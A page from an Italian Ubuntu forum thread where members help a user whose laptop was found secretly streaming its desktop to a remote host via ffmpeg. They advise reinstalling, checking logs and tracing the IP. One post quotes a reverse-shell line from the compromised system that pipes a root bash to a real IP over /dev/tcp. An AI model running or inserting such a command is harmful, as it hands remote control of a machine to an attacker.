Pagina 2 di 3

Re: Ventole quasi sempre accese.

Inviato: venerdì 1 novembre 2019, 0:01
da andrea111
vorrei capire da quanto tempo, come si sia installato.
Quando installato lo vedi dalle Proprietà del pacchetto debconfi, la data di ultima modifica di solito è la data di installazione che dovrebbe essere la stessa di systemdi.

Per il "come" bisogna essere indovini, certo che è un file di una semplicità disarmante, praticamente spiava tutto quello che appariva sul desktop (cioè tutta la tua attività), certo che in questo modo inviava in rete una gran quantità di dati, gli streaming video sono parecchio onerosi.
Mai notato strani movimenti nell'attività di rete? un monitor di rete, anche molto semplice, ti avrebbe indicato un'attività sospetta.

Il domandone sarebbe: chi riceveva i dati di quello stream?

Re: Ventole quasi sempre accese.

Inviato: venerdì 1 novembre 2019, 16:53
da frapox
kjmario78 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5160080#p5160080][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:
frapox [url=https://forum.ubuntu-it.org/viewtopic.php?p=5160057#p5160057][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:
kjmario78 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5160054#p5160054][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:Sto riflettendo.. infatti prima di rimuovere quel file dando come comando /usr/bin/systemdi -h mi stampava ffmpeg . Ma adesso che ho eliminato quel file cosa dovrei fare?
Beh, considerando che a tua insaputa avevi uno script che faceva streaming del tuo schermo e lo inviava in remoto a qualcuno... direi che l'unica cosa da fare è: salvare i tuoi dati, e reinstallare ubuntu pulito.

Inoltre direi che devi cambiare tutte le password di accesso ai siti che hai digitato (in chiaro).

E d'ora in avanti installare solo roba proveniente dai repo o da fonti terze ma ultra-fidate.
Grazie per i preziosi consigli. . ma non c'è modo di approfondire attraverso i log? vorrei capire da quanto tempo, come si sia installato..
Gli unici log su cui puoi trovare qualcosa si trovano in /var/log... puoi salvarti la dir e le sue subdir nella tua home e analizzarli con calma in un secondo momento (con grep o qualsiasi altro tool di ricerca). Questo comunque non ti esonera dal dover reinstallare il sistema, essendo stato con buona probabilità compromesso.

Però dubito che, se quei file appartenessero a del software malevolo, abbiano lasciato traccia nei log ufficiali.
andrea111 ha scritto:Quando installato lo vedi dalle Proprietà del pacchetto debconf, la data di ultima modifica di solito è la data di installazione che dovrebbe essere la stessa di systemdi.
Debconf non è il pacchetto che include quel file debconfi, come abbiamo già scoperto qualche post indietro, quindi non puoi vedere nulla dal package manager... Allo stesso modo systemdi non appartiene a nessun pacchetto ufficiale della distribuzione.

Al massimo si può andare alla ricerca di eventuali file di log lasciati in giro da quegli script (che comunque chiamavano ffmpeg) sempre che ne abbia lasciati.
andrea111 ha scritto:Per il "come" bisogna essere indovini, certo che è un file di una semplicità disarmante, praticamente spiava tutto quello che appariva sul desktop (cioè tutta la tua attività), certo che in questo modo inviava in rete una gran quantità di dati, gli streaming video sono parecchio onerosi.
Lo stream che veniva inviato era codificato in h264 quindi pochi Mbps, non particolarmente oneroso.

Ma comunque questo parametro non aiuta risponde alla "come ci sono finiti quei file sul mio sistema?".

Secondo me, oltre alla ricerca di eventuali file (improbabili) che ffmpeg possa aver lasciato in giro, un altro modo indiretto per capire il come e il perché è partire dal quando: capire da quanto tempo c'era il problema delle ventole, risalire al giorno (o circoscrivere il più possibile l'argo temporale), da qui analizzare tutto quello che si è installato (sopratutto non ufficiale, vedi pacchetti presi un po' alla rinfusa dal web) e tutta l'attività web (magari una pagina di un sito web compromesso).

Chiaramente tutto questo è oneroso in termini di tempo e non è detto che porti a qualche risposta utile.

Re: Ventole quasi sempre accese.

Inviato: venerdì 1 novembre 2019, 17:07
da kjmario78
andrea111 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5160085#p5160085][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:
vorrei capire da quanto tempo, come si sia installato.
Quando installato lo vedi dalle Proprietà del pacchetto debconf, la data di ultima modifica di solito è la data di installazione che dovrebbe essere la stessa di systemdi.

Per il "come" bisogna essere indovini, certo che è un file di una semplicità disarmante, praticamente spiava tutto quello che appariva sul desktop (cioè tutta la tua attività), certo che in questo modo inviava in rete una gran quantità di dati, gli streaming video sono parecchio onerosi.
Mai notato strani movimenti nell'attività di rete? un monitor di rete, anche molto semplice, ti avrebbe indicato un'attività sospetta.

Il domandone sarebbe: chi riceveva i dati di quello stream?

Potresti spiegarmi meglio la procedura del pacchetto debconf, risalendo alla data di installazione potrei risalire ad ulteriori dettagli e magari ricordare cosa sia successo in quel giorno.

L'unica cosa che ho notato da circa un mese sono state le ventole sempre accese che non mi spiegavo visto che usavo il portatile solo per navigare.


Grazie anche a te per la tua disponibilità

Re: Ventole quasi sempre accese.

Inviato: venerdì 1 novembre 2019, 18:45
da andrea111
Clic destro sul pacchetto, selezioni Proprietà e lì vedi due date (e ora): ultimo accesso e ultima modifica (che di solito per quei file è quella di installazione perché una volta installati non vengono più variati (almeno in via di massima il criterio è affidabile).

Dato che per scrivere in /usr ed in /etc bisogna avere i privilegi di root, potresti tentare una scansione per la presenza di backdoor, può essere che trovi qualcosa.

Anche: dalla data di installazione potresti risalire ad eventuali e-mail malevole aperte (phishing).

Se intendi approfondire nella ricerca e trovare suggerimenti meglio mirati, ti consiglierei di cambiare il titolo del primo intervento (quello con cui hai aperto la discussione). Visto che ormai è accertato che si tratta di un'intrusione, troverai suggerimenti più appropriati.
"Ventole al massimo" non è per niente indicativo, visto quello che è emerso.
"Intrusione nel sistema, consigli" mi sembra più indicato, vedi tu che forma dargli.

Re: Ventole quasi sempre accese.

Inviato: venerdì 1 novembre 2019, 19:56
da Mdfalcubo
Sposto in sicurezza visto che si è appurato che la natura del problema non è di driver/hardware.

Re: Ventole quasi sempre accese.

Inviato: venerdì 1 novembre 2019, 22:21
da kjmario78
Perfetto. L'altro file in questione che non ho cancellato risulta come data di ultima modifica 11 Ottobre. Quindi presumo che in quella data sia accaduto.


Immagine

andrea111 ha scritto:Clic destro sul pacchetto, selezioni Proprietà e lì vedi due date (e ora): ultimo accesso e ultima modifica (che di solito per quei file è quella di installazione perché una volta installati non vengono più variati (almeno in via di massima il criterio è affidabile).

Dato che per scrivere in /usr ed in /etc bisogna avere i privilegi di root, potresti tentare una scansione per la presenza di backdoor, può essere che trovi qualcosa.

Anche: dalla data di installazione potresti risalire ad eventuali e-mail malevole aperte (phishing).

Se intendi approfondire nella ricerca e trovare suggerimenti meglio mirati, ti consiglierei di cambiare il titolo del primo intervento (quello con cui hai aperto la discussione). Visto che ormai è accertato che si tratta di un'intrusione, troverai suggerimenti più appropriati.
"Ventole al massimo" non è per niente indicativo, visto quello che è emerso.
"Intrusione nel sistema, consigli" mi sembra più indicato, vedi tu che forma dargli.
Mdfalcubo [url=https://forum.ubuntu-it.org/viewtopic.php?p=5160216#p5160216][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:Sposto in sicurezza visto che si è appurato che la natura del problema non è di driver/hardware.
grazie.

Re: Pc compromesso, consigli.

Inviato: venerdì 1 novembre 2019, 23:03
da Pike
Copia da parte tutto. Poi formatta.

Re: Pc compromesso, consigli.

Inviato: sabato 2 novembre 2019, 1:04
da Filoteo

Codice: Seleziona tutto

#sudo su test -c /bin/bash >& /dev/tcp/188.217.151.81/7576 0>&1
Sebbene commentata, quindi disattivata, questa riga è chiaramente una backdoor che invia una shell al computer con l'IP di sopra (Vodafone). Sostanzialmente permette di eseguire comandi sul tuo PC a tua insaputa come utente "test". Quoto il suggerimento di @Pike, e aggiungo che dovresti reinstallare tramite una penna USB di Ubuntu creata con un PC diverso da questo compromesso. Potresti per caso dirci cosa fai esattamente col PC? E' un po' mediocre una backdoor che invia lo streaming dello schermo, potrebbe essere uno scherzo/dispetto di qualcuno a cui hai fatto usare il PC (oppure ti ha detto di aprire un file inviato per posta)?

Re: Pc compromesso, consigli.

Inviato: sabato 2 novembre 2019, 4:08
da woddy68
Comunque un consiglio per tutti, tenete sempre sott'occhio la cpu, capite subito se ci sono attività strane, esistono i vari applet o plasmoidi o altro a seconda del DE che usate, ma è sempre bene tenerla sempre sott'occhio. Internet è piena anche di malware che fanno mining a vostra insaputa, ma se si controlla la cpu lo capisci subito.

Re: Pc compromesso, consigli.

Inviato: sabato 2 novembre 2019, 8:34
da thece
Ammesso che non sia un indirizzo IP "zombie", hai un punto di partenza per far partire un'indagine di Polizia Postale e far luce sull'accaduto.
L'indirizzo IP appartiene a Telecom Italia, quindi sei avvantaggiato.

Codice: Seleziona tutto

nslookup 2.114.244.114

114.244.114.2.in-addr.arpa	name = host114-244-static.114-2-b.business.telecomitalia.it.

Re: Pc compromesso, consigli.

Inviato: sabato 2 novembre 2019, 10:53
da Pike
Non poco. E' un indirizzo IP statico.

Re: Pc compromesso, consigli.

Inviato: sabato 2 novembre 2019, 11:50
da maxbigsi
mi scuso per l'OT ma è un po inquietante questa cosa, quoto quanto scritto da thece :sisi:

Re: Pc compromesso, consigli.

Inviato: sabato 2 novembre 2019, 17:00
da freengin
Infatti già solo il comando

Codice: Seleziona tutto

whois 2.114.244.114
da risultati interessanti ... :sisi:

Re: Pc compromesso, consigli.

Inviato: mercoledì 6 novembre 2019, 14:53
da zuino1
scusate ma è stata fatta ulteriore luce su quanto accaduto?

Penso che sarebbe utile a tutta la community ubuntu sapere come è stata possibile una cosa del genere.

Da quel che so, diverse persone usano ubuntu anche per una maggiore sicurezza nei confronti di altri sistemi. Se basta uno script per mandare addirittura in remoto lo streaming del proprio desktop, credo proprio sia necessario capire se il tutto sia frutto di una installazione di qualche applicazione "poco raccomandabile", o se c'è dell'altro.

Re: Pc compromesso, consigli.

Inviato: mercoledì 6 novembre 2019, 15:19
da thece
No, @kjmario78 non ha più scritto.
zuino1 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5161021#p5161021][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto: Penso che sarebbe utile a tutta la community ubuntu sapere come è stata possibile una cosa del genere.
Non è possibile saperlo se non intervistando molto accuratamente @kjmario78 ed analizzando altrettanto molto accuratamente il suo sistema.
zuino1 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5161021#p5161021][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto: Da quel che so, diverse persone usano ubuntu anche per una maggiore sicurezza nei confronti di altri sistemi. Se basta uno script per mandare addirittura in remoto lo streaming del proprio desktop, credo proprio sia necessario capire se il tutto sia frutto di una installazione di qualche applicazione "poco raccomandabile", o se c'è dell'altro.
Usare Linux può potenzialmente rendere più sicuro il proprio sistema, ma un sistema vulnerabile rimane tale indipendentemente dal fatto che sia Linux, Windows, MacOS, Android, etc, etc ...
Come si sul dire: la Sicurezza è un processo, non un prodotto. Il tuo sistema non è sicuro perchè usi Linux. Il tuo sistema è sicuro perchè metti in opera tutta una serie di misure, comportamenti atti a renderlo sicuro, indipendentemente dal sistema operativo usato. Vero è che non tutti i sistemi operativi sono progettati uguali ed alcuni sono naturalmente più predisposti di altri ad essere resi sicuri.

Re: Pc compromesso, consigli.

Inviato: mercoledì 6 novembre 2019, 15:36
da zuino1
thece [url=https://forum.ubuntu-it.org/viewtopic.php?p=5161029#p5161029][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:
zuino1 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5161021#p5161021][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:
zuino1 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5161021#p5161021][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto: Da quel che so, diverse persone usano ubuntu anche per una maggiore sicurezza nei confronti di altri sistemi. Se basta uno script per mandare addirittura in remoto lo streaming del proprio desktop, credo proprio sia necessario capire se il tutto sia frutto di una installazione di qualche applicazione "poco raccomandabile", o se c'è dell'altro.
Usare Linux può potenzialmente rendere più sicuro il proprio sistema, ma un sistema vulnerabile rimane tale indipendentemente dal fatto che sia Linux, Windows, MacOS, Android, etc, etc ...
Come si sul dire: la Sicurezza è un processo, non un prodotto. Il tuo sistema non è sicuro perchè usi Linux. Il tuo sistema è sicuro perchè metti in opera tutta una serie di misure, comportamenti atti a renderlo sicuro, indipendentemente dal sistema operativo usato. Vero è che non tutti i sistemi operativi sono progettati uguali ed alcuni sono naturalmente più predisposti di altri ad essere resi sicuri.
si, su questo sono d'accordo.
Non sono certo un esperto, ma già il fatto che linux per molte operazioni richieda diritti di root, mi lascia più tranquillo (installare poi app solo dall'ubuntu software center, aggiornare sempre il pc e soprattutto usare il cervello, credo siano già un buon inizio)
il fatto però che ad utente, che dice di usare il pc "solo" per navigare, si installi un processo in una cartella root mi fa "molto windows", più che ubuntu .. speriamo ci aiuti a capire come è stato possibile!

Re: Pc compromesso, consigli.

Inviato: mercoledì 6 novembre 2019, 15:48
da thece
zuino1 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5161033#p5161033][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto: Non sono certo un esperto, ma già il fatto che linux per molte operazioni richieda diritti di root, mi lascia più tranquillo
Veramente anche Windows richiede di essere Amministratore.
zuino1 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5161033#p5161033][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto: il fatto però che ad utente, che dice di usare il pc "solo" per navigare, si installi un processo in una cartella root mi fa "molto windows", più che ubuntu .. speriamo ci aiuti a capire come è stato possibile!
Evidentemente ha subito un hack che ha permesso di arrivare - eventualmente in più passaggi - ai privilegi di root. E una volta diventati root si fa quel che si vuole.
Per il "sapere come", vale quanto ho già scritto. Ha scaricato qualcosa di malevolo? Ha subito il fascino dell'Ingegneria Sociale? Si è fidato di qualcuno di cui non doveva fidarsi? Chi lo sa

Esempio assolutamente inventato: un amico chiede a @kjmario78 di prestargli un pò di spazio disco, o un qualche servizio - fai tu - perchè a bisogno di poter accedere da Internet a del materiale o al servizio. @kjmario78 per amicizia lo fa accedere al suo server FTP, SSH o quant'altro. L'amico si accorge che c'è una configurazione mal fatta e con un pò di privilege escalation riesce ad ottenere i privilegi di root. Da lì decide di farsi i fatti di @kjmario78 e fare un pò di live streaming verso casa sua.

La sua "fortuna", se così la vogliamo chiamare, è che ha un ottimo punto di partenza da cui iniziare per un'indagine ufficiale. Sempre che sporga denuncia. Sempre che venga preso nella giusta considerazione.

Re: Pc compromesso, consigli.

Inviato: mercoledì 6 novembre 2019, 16:25
da frapox
Sempre se non si tratti di un troll o di uno che sta facendo un corso di pentesting...

L'ipotesi dell'ingegneria sociale è sempre quella più concreta, secondo me.

Re: Pc compromesso, consigli.

Inviato: mercoledì 6 novembre 2019, 16:27
da woddy68
zuino1 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5161033#p5161033][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:
thece [url=https://forum.ubuntu-it.org/viewtopic.php?p=5161029#p5161029][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:
zuino1 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5161021#p5161021][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto:
zuino1 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5161021#p5161021][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto: Da quel che so, diverse persone usano ubuntu anche per una maggiore sicurezza nei confronti di altri sistemi. Se basta uno script per mandare addirittura in remoto lo streaming del proprio desktop, credo proprio sia necessario capire se il tutto sia frutto di una installazione di qualche applicazione "poco raccomandabile", o se c'è dell'altro.
Usare Linux può potenzialmente rendere più sicuro il proprio sistema, ma un sistema vulnerabile rimane tale indipendentemente dal fatto che sia Linux, Windows, MacOS, Android, etc, etc ...
Come si sul dire: la Sicurezza è un processo, non un prodotto. Il tuo sistema non è sicuro perchè usi Linux. Il tuo sistema è sicuro perchè metti in opera tutta una serie di misure, comportamenti atti a renderlo sicuro, indipendentemente dal sistema operativo usato. Vero è che non tutti i sistemi operativi sono progettati uguali ed alcuni sono naturalmente più predisposti di altri ad essere resi sicuri.
si, su questo sono d'accordo.
Non sono certo un esperto, ma già il fatto che linux per molte operazioni richieda diritti di root, mi lascia più tranquillo (installare poi app solo dall'ubuntu software center, aggiornare sempre il pc e soprattutto usare il cervello, credo siano già un buon inizio)
il fatto però che ad utente, che dice di usare il pc "solo" per navigare, si installi un processo in una cartella root mi fa "molto windows", più che ubuntu .. speriamo ci aiuti a capire come è stato possibile!
Con le abitudini che abbiamo noi, non credere sia così difficile, basta uno script e che tu (cosa che fanno in molti) apra da root il file manager, quando si dice di evitare di utilizzare applicazioni grafiche da root, non lo si fa per divertimento, eppure se guardi anche qui sul forum, non è raro leggere, apri gedit da root o apri nautilus da root.

Re: Pc compromesso, consigli.

Inviato: mercoledì 6 novembre 2019, 16:43
da thece
woddy68 [url=https://forum.ubuntu-it.org/viewtopic.php?p=5161047#p5161047][img]https://forum.ubuntu-it.org/images/icons/icona-cita.gif[/img][/url] ha scritto: ... e che tu (cosa che fanno in molti) apra da root il file manager, quando si dice di evitare di utilizzare applicazioni grafiche da root, non lo si fa per divertimento, eppure se guardi anche qui sul forum, non è raro leggere, apri gedit da root o apri nautilus da root.
Un attimo: si invita a non usare root per la consueta operatività. Ci sono operazioni di amministrazione per cui l'uso di root è mandatorio, a meno di non avere una gestione delle autorizzazioni e dei permessi maniacale.
Un conto è aprire temporanemente con sudo GEdit e modificare un file di configurazione. Un conto è aprire con sudo Firefox e navigare sul Web o Nautilus per gestire i file perchè mi scoccio con i permessi.